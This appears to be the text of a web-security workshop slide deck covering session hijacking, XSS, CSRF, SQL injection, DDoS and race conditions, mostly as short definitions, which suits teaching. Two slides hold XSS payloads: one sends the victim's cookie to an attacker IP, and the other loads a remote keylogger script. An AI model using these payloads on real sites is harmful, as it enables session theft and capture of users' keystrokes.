1.
Workshop
Web Security application

2.
DAOULAT KHALIL
github.com/Vvoox
fb.com/daoulat.khalil

3.
Session Hijacking
TCP session hijacking is a security attack on a user
session over a protected network. The most
common method of session hijacking is called IP
spoofing, when an attacker uses source-routed IP
packets to insert commands into an active
communication between two nodes on a network
and disguising itself as one of the authenticated
users. This type of attack is possible because
authentication typically is only done at the start
of a TCP session.

4.
The HJ Attack:
Send to the victim : http://site.com//?name=<script>new
Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>

5.
XSS Cross Site Scripting
Cross-site scripting (XSS) is a type of computer
security vulnerability typically found in web
applications. XSS enables attackers to inject
client-side scripts into web pages viewed by
other users.

6.
XSS : Persistent (or stored)
The persistent (or stored) XSS vulnerability is
a more devastating variant of a cross-site
scripting flaw: it occurs when the data
provided by the attacker is saved by the
server, and then permanently displayed on
"normal" pages returned to other users in
the course of regular browsing, without
proper HTML escaping. A classic example of
this is with online message boards where
users are allowed to post HTML formatted
messages for other users to read

7.
XSS : Non-persistent (reflected)
Reflected Cross-site Scripting (XSS) occur when an
attacker injects browser executable code within a single
HTTP response. The injected attack is not stored within
the application itself; it is non-persistent and only
impacts users who open a maliciously crafted link or
third-party web page. The attack string is included as
part of the crafted URI or HTTP parameters, improperly
processed by the application, and returned to the victim.

8.
XSS : Capture the keystrokes by injecting a keylogger
In this attack scenario, we will inject a JavaScript keylogger into
the vulnerable web page and we will capture all the keystrokes
of the user within the current page.
http://Site.com/crisis/?name=<script src="http://My_IP/Crisis.js"></script>

9.
XSS : Keylogger

10.
XSS : Keylogger

11.
CSRF
Cross-site request forgery (also known as
CSRF) is a web security vulnerability that
allows an attacker to induce users to
perform actions that they do not intend
to perform. It allows an attacker to partly
circumvent the same origin policy, which
is designed to prevent different websites
from interfering with each other.

12.
SQL Injection

13.
SQL Injection

14.
SQL Injection

15.
Type 1 : Error-based SQLi
the attacker performs actions that cause the database to produce error messages. The
attacker can potentially use the data provided by these error messages to gather
information about the structure of the database.

16.
Type 2 : Union-based SQLi
this technique takes advantage of the UNION SQL operator, which fuses multiple select statements
generated by the database to get a single HTTP response. This response may contain data that can
be leveraged by the attacker.

17.
SQL Injection

18.
DDOS ATTACK

19.
DDos Attack
a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network
resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to
the Internet.

20.
Ddos Attack

21.
DDos Attack

22.
Race Condition
A race condition or race hazard is the condition of an
electronics, software, or other system where the system's
substantive behavior is dependent on the sequence or timing
of other uncontrollable events. It becomes a bug when one or
more of the possible behaviors is undesirable.

23.
Race Condition

24.
THE End
Any Questions?